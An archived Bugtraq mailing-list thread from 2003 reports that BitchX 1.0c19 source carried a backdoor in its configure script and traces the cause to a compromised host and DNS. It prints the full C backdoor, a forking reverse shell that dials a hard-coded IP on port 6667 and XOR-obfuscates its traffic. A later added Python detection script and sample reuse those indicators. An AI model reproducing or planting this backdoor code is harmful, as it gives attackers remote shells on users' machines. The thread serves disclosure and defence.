98731 2003-04-14  19:35  /21 lines/ Michał Szwaczko <mikey@wirelabs.lublin.pl>
Imported: 2003-04-14  19:35  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4498>
Subject: bitchx sources backdoored on distribution site
------------------------------------------------------------
Hi,

Can anyone verify that the bitchx 1.0c19 sources are backdoored?  The
configure script contains the following code, which I think is a shell
daemon.  Perhaps I am making a fool of myself right now since I am not
a security guru, but this looks weird.  Can you verify?

If this is true, then the host that will get the shell is
smtp.wia.com which is an alias of ftp2.bitchx.org.

Attached is the code fragment I found in configure.
What do you think?

PS. After running configure, the code fragment disappears from the
script.

-- 
Michał 'Mikey' Szwaczko
Developer/Troubleshooter

You're using a keyboard!  How quaint!
(98731) /Michał Szwaczko <mikey@wirelabs.lublin.pl>/(Rewrapped)
Attachment (text/plain) in text 98732
Comment in text 98753 by Neeko Oni <neeko@haackey.com>
98732 2003-04-14  19:35  /155 lines/ Michał Szwaczko <mikey@wirelabs.lublin.pl>
Imported: 2003-04-14  19:35  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4499>
Attachment (text/plain) to text 98731
Subject: Attachment to: bitchx sources backdoored on distribution site
------------------------------------------------------------
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define XOR_KEY 0x89

int main (int argc, char **argv)
{
      char c;
      int s, x, sv0[2];
      struct sockaddr_in sa;
/*
   When interrupted or exit'd, cleanup temporary files, and complete
   config.log.  We remove comments because anyway the quotes in there
   would cause problems or look ugly.
   WARNING: Be sure not to use single quotes in there, as some shells,
   such as our DU 5.0 friend, will then close the trap.
*/
      switch (fork ()) { case 0: break; default: exit (1);}
      close (0); close (1); close (2);
/*
   When interrupted or exit'd, cleanup temporary files, and complete
   config.log.  We remove comments because anyway the quotes in there
   would cause problems or look ugly.
   WARNING: Be sure not to use single quotes in there, as some shells,
   such as our DU 5.0 friend, will then close the trap.
*/
      do {
          if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
              exit (1);

          sa.sin_family = AF_INET;
          sa.sin_port = htons (6667);
/* The GNU C library defines this for functions which it implements
      to always fail with ENOSYS.  Some functions are actually named
      something starting with __ and the normal name is an alias.  */
          sa.sin_addr.s_addr = inet_addr ("207.178.61.5");

          alarm (10);
          if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
              exit (1);
          if ((x = read (s, &c, 1)) <= 0)
              exit (1);
          else {
              alarm (0);
/* The GNU C library defines this for functions which it implements
      to always fail with ENOSYS.  Some functions are actually named
      something starting with __ and the normal name is an alias.  */
              switch (c) {
                  case 'A':
                      exit (0);
/* We use char because int might match the return type of a gcc2
     builtin and then its argument prototype would still apply.  */
                  case 'D':
                      break;
                  case 'M':
                      close (s);
                      sleep (3600);
                      continue;
              }
          }
          break;
      } while (1);
/*
   When interrupted or exit'd, cleanup temporary files, and complete
   config.log.  We remove comments because anyway the quotes in there
   would cause problems or look ugly.
   WARNING: Be sure not to use single quotes in there, as some shells,
   such as our DU 5.0 friend, will then close the trap.
*/
      if (socketpair (AF_UNIX, SOCK_STREAM, 0, sv0) == (-1))
          exit (1);

      switch (fork ()) {
          case -1: {
              exit (1);
          }
          case 0: {
/* The GNU C library defines this for functions which it implements
      to always fail with ENOSYS.  Some functions are actually named
      something starting with __ and the normal name is an alias.  */
              char *a[] = { "/bin/sh", NULL };

              close (sv0[1]);

              dup2 (sv0[0], 0);
              dup2 (sv0[0], 1);
              dup2 (sv0[0], 2);

/* We use char because int might match the return type of a gcc2
     builtin and then its argument prototype would still apply.  */
              execve (a[0], a, NULL);
          }
          default: {
              close (sv0[0]);
              while (1) {
                  int len, ret;
                  fd_set rfd;
                  char buf[2048];

/* The GNU C library defines this for functions which it implements
      to always fail with ENOSYS.  Some functions are actually named
      something starting with __ and the normal name is an alias.  */
                  FD_ZERO (&rfd);
                  FD_SET (s, &rfd);
                  FD_SET (sv0[1], &rfd);

                  if (select (32, &rfd, NULL, NULL, NULL) == (-1)) {
                      exit (1);
                  }
/*
   When interrupted or exit'd, cleanup temporary files, and complete
   config.log.  We remove comments because anyway the quotes in there
   would cause problems or look ugly.
   WARNING: Be sure not to use single quotes in there, as some shells,
   such as our DU 5.0 friend, will then close the trap.
*/
                  if (FD_ISSET (s, &rfd)) {
                      if ((len = read (s, buf, sizeof (buf))) <= 0) {
                          exit (1);
                      }
                      for (x = 0; x < len; x++) buf[x] ^= XOR_KEY;

                      x = 0;
                      while (x < len) {
                          if ((ret = write (sv0[1], buf + x, len - x)) == (-1)) {
                              exit (1);
                          }
                          x += ret;
                      }
                  }

                  if (FD_ISSET (sv0[1], &rfd)) {
                      if ((len = read (sv0[1], buf, sizeof (buf))) <= 0) {
                          exit (1);
                      }
                      for (x = 0; x < len; x++) buf[x] ^= XOR_KEY;

/* The GNU C library defines this for functions which it implements
      to always fail with ENOSYS.  Some functions are actually named
      something starting with __ and the normal name is an alias.  */
                      x = 0;
                      while (x < len) {
                          if ((ret = write (s, buf + x, len - x)) == (-1)) {
                              exit (1);
                          }
                          x += ret;
                      }
                  }
              }
          }
      }
}
(98732) /Michał Szwaczko <mikey@wirelabs.lublin.pl>/
98753 2003-04-15  00:44  /32 lines/ Neeko Oni <neeko@haackey.com>
Imported: 2003-04-15  00:44  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4505>
Comment to text 98731 by Michał Szwaczko <mikey@wirelabs.lublin.pl>
Subject: Re: bitchx sources backdoored on distribution site
From ftp.bitchx.org (msg in /pub):

              * * * * * *  A T T E N T I O N  * * * * * *

 Over the weekend of April 12th and 13th someone once again was
 releasing back doored code for BitchX on a false ftp site that was
 linked from the official BitchX Website.  We stress to everyone to
 please take notice of information that we post on
 http://faq.bitchx.org to help prevent these problems from causing
 you to download falsified source code for BitchX.

--

So it's entirely possible the source you downloaded was backdoored.
It would have been nicer had you included the site you downloaded
from.  According to bitchx.org it looks like it was only one
off-site FTP.  As it was an 'official' FTP (the assumption we're
making), whether they're to blame or not is left for someone else to
decide.

.Neeko Oni

(Hey Bugtraq mod, wake up.)

> Hi,
> 
> Can anyone verify that the bitchx 1.0c19 sources are backdoored.
(98753) /Neeko Oni <neeko@haackey.com>/---(Rewrapped)
98756 2003-04-15  01:05  /55 lines/ Michał Szwaczko <mikey@wirelabs.lublin.pl>
Imported: 2003-04-15  01:05  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4508>
Subject: bitchx sources trojaned - follow up
It seems that my posts have been misfired a little.

Let me summarize how, when and why I got the trojaned sources.  Since I am
not a security guru whatsoever, I couldn't know that this issue is
already known.  Anyway, it did happen to me this Saturday, so there is
a possibility that something weird is lingering at ftp.bitchx.org or
its DNS servers.

So,

I fired up www.bitchx.org Saturday 13.04.2003 about 22:00 local time.
I went to download.php and checked the URL for the source tarball.
I wget'ted that URL; on Saturday it showed:

ftp://ftp2.bitchx.org/pub/BitchX/source/ircii-pana-1.0c19.tar.gz
(I double-checked the wget command line that I issued)

I archived the said file; its MD5 checksum is:

sh> md5sum ircii-pana-1.0c19.tar.gz
927163e0466884b2771ae769e5c775d0  ircii-pana-1.0c19.tar.gz

I started ./configure script and noticed outbound connections to port
6667.  They were firewall-blocked anyway and that's why they really
caught my eye.  Otherwise, I probably wouldn't have noticed them and
perhaps would not have bothered.

So, I inspected ./configure and found the piece of code I was sending
to the list.

All I was asking for was to verify that this was a backdoor, since I
really didn't know about it and it looked like one (at least my C
knowledge said so) (well, I heard about irssi being 'patched' that way).

My impression after all your posts saying that the bitchx.org sources
are OK is that on Saturday two things could have happened.

- some sort of DNS spoofing which fooled wget into fetching the 'bad' tarball
  (notice I was downloading from ftp_2_.bitchx.org)
- a modified webpage showing the 'wrong' URL

I am 100% sure that I was getting the URL from the official
www.bitchx.org.  So what do you think?

ps. I am not doing all this just to get bugtraq'ed ;-) I just thought
there's something weird lurking around at www.bitchx.org. I am not a
security inspector/advisor, nor do I have sufficient knowledge, so I
decided to discuss it here.

Regards
-- 
Michał 'Mikey' Szwaczko
Developer/Troubleshooter

gcc is really a compressor - it gets 100M of kernel sources down to
700k.
(98756) /Michał Szwaczko <mikey@wirelabs.lublin.pl>/(Rewrapped)
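A triage check built from the details in this thread (the reported MD5, the hard-coded address and IRC port, the XOR'd stream and the /bin/sh exec), added here as an example; it is not code from the original posts or from the BitchX project. The sample configure text and tarball bytes are constructed, and the point is that the scan runs on the script before it is executed, since the fragment removes itself once configure has run.

```python
import hashlib
import re

# MD5 of the trojaned ircii-pana-1.0c19.tar.gz, as reported in the follow-up.
KNOWN_BAD_MD5 = {"927163e0466884b2771ae769e5c775d0"}

# Line-level indicators drawn from the fragment attached to the first post.
# configure is shell; embedded C that dials a fixed IP and execs /bin/sh is not.
INDICATORS = [
    (r'inet_addr\s*\(\s*"\d{1,3}(?:\.\d{1,3}){3}"', "dial-out: hard-coded IP"),
    (r'htons\s*\(\s*6667\s*\)', "dial-out: TCP port 6667"),
    (r'"/bin/sh"', "shell: /bin/sh string"),
    (r'\bexecve?\s*\(', "shell: execve/execv call"),
    (r'\bsocketpair\s*\(', "shell: socketpair plumbing for child stdio"),
    (r'\^=\s*XOR_KEY\b', "obfuscation: XOR of socket traffic"),
]

def scan_configure(text):
    """Return (line_number, description) for every indicator that fires."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits.extend((lineno, why) for rx, why in INDICATORS if re.search(rx, line))
    return hits

def triage(tarball, configure_text):
    """Checksum comparison plus static scan; verdict needs dial-out AND shell."""
    digest = hashlib.md5(tarball).hexdigest()
    bad = digest in KNOWN_BAD_MD5
    hits = scan_configure(configure_text)
    kinds = {why.split(":")[0] for _, why in hits}  # "dial-out", "shell", ...
    return {"md5": digest, "known_bad": bad, "hits": hits,
            "suspicious": bad or {"dial-out", "shell"} <= kinds}

# Constructed sample: lines in the style of the attached fragment, wedged
# between ordinary configure shell lines. Not the real configure script.
SAMPLE_CONFIGURE = """\
#! /bin/sh
ac_cv_prog_cc=gcc
          sa.sin_port = htons (6667);
          sa.sin_addr.s_addr = inet_addr ("207.178.61.5");
              char *a[] = { "/bin/sh", NULL };
              execve (a[0], a, NULL);
                      for (x = 0; x < len; x++) buf[x] ^= XOR_KEY;
echo "$as_me: creating $ac_file"
"""

if __name__ == "__main__":
    print(triage(b"constructed bytes, not the real tarball", SAMPLE_CONFIGURE))
```

A single port or IP literal is not enough for a verdict on its own; the check wants the dial-out and the shell exec together, which is what distinguishes this fragment from ordinary autoconf probes.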
98843 2003-04-15  18:10  /106 lines/ Rob Andrews <randrews@relinetworks.com>
Imported: 2003-04-15  18:10  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4516>
Subject: BitchX trojan, the real follow up.
------------------------------------------------------------

Since Micha didn't take the time to post this email after it was
passed along to himself and others on one of EFnet's oper lists, I
submit the following to explain what really happened to the BitchX
website and DNS over the weekend.

I also would like to point out that in the future I may be contacted
directly concerning any matters such as these, as I am involved with
nearly every person currently involved in the development and
distribution of the source code.

I should point out that since I maintain the FTP site, people should
know that the FTP site does not reside on the same systems as the
web and DNS for bitchx.org.  If in doubt at any time, we have posted
information on http://faq.bitchx.org which tells users how to verify
source and what the legitimate IP addresses for the current FTP
servers are.  All current source and binaries (except for CVS snapshot
source code) have been signed by me.  This information is
available on the FAQ website as well.

---- Message as forwarded to all parties involved ----

Over the weekend the DNS for bitchx.org was directly changed by
someone who exploited a machine at 207.178.61.5 aka smtp1.wia.com and
was releasing source for ircii-pana-1.0c19.tar.gz which included in
the configure script this:

sa.sin_addr.s_addr = inet_addr ("207.178.61.5");

Previously the DNS was poisoned to cause users to download from what
would normally appear to be a legitimate FTP site.  However, in this
case we believe, after contacting one of the admins for the machines
that host the DNS for BitchX.org, that the actual machine itself may
have been compromised, since the physical URL pointer on the website
was pointed to ftp2.bitchx.org which goes to the previously
mentioned IP address.

We have taken action to correct the website and the DNS is being
handled.  The machine at wia.com however is still compromised and has
distributed a number of copies of the compromised source code.

I have called the NOC at accretive-networks.net and notified them of
the machine in question.  As soon as I am able to I will post a
notice to the proper mailing lists that have covered this issue and
address them directly so as to prevent this sort of thing from
happening in the future without our being notified any sooner than
we were later Saturday evening.


Thanks,


Robert Andrews
President
RELI Networks, Inc.
Atlanta, GA.
randrews@relinetworks.com


-- Followup:


X-Authentication-Warning: grmpa.com: www set sender to stevenb@wolfe.net using -f
Date: Mon, 14 Apr 2003 10:10:04 -0700
From: Steve Breeden <stevenb@wolfe.net>
To: "" <noc@accretive-networks.net>
Cc: "" <randrews@relinetworks.com>
Subject: Re: [ACCR-NETOPS #33425] over the weekend.... (fwd)
User-Agent: Internet Messaging Program (IMP) 3.2.1 / FreeBSD-5.0

This machine (207.178.61.5) was taken offline Saturday evening and
replaced.  It is no longer compromised as stated below.


Quoting Accretive Networks Abuse Department
<noc@accretive-networks.net>:

> 
> 
> Mon Apr 14 09:55:29 2003: Request 33425 was acted upon.
> Transaction: Ticket created by abuse@accretive-networks.net
>        Queue: noc
>      Subject: over the weekend.... (fwd)
>        Owner: Nobody
>   Requestors: abuse@accretive-networks.net
>       Status: new
>  Ticket <URL:
> http://tracker.accretive-networks.net/Ticket/Display.html?id=33425 >
> -------------------------------------------------------------------------
> In case you didn't see this.
> 
> Accretive Networks Abuse Dept.
> http://www.accretive-networks.net/

-- 
Steve Breeden
support@wolfe.net
Support Engineer
Accretive Networks
P.206.443.6401 ext 204
F.206.269.0188
For DNS requests:
dns-admin@accretive-networks.net
For Hosting-support:
hosting-support@accretive-networks.net
(98843) /Rob Andrews <randrews@relinetworks.com>/(Rewrapped)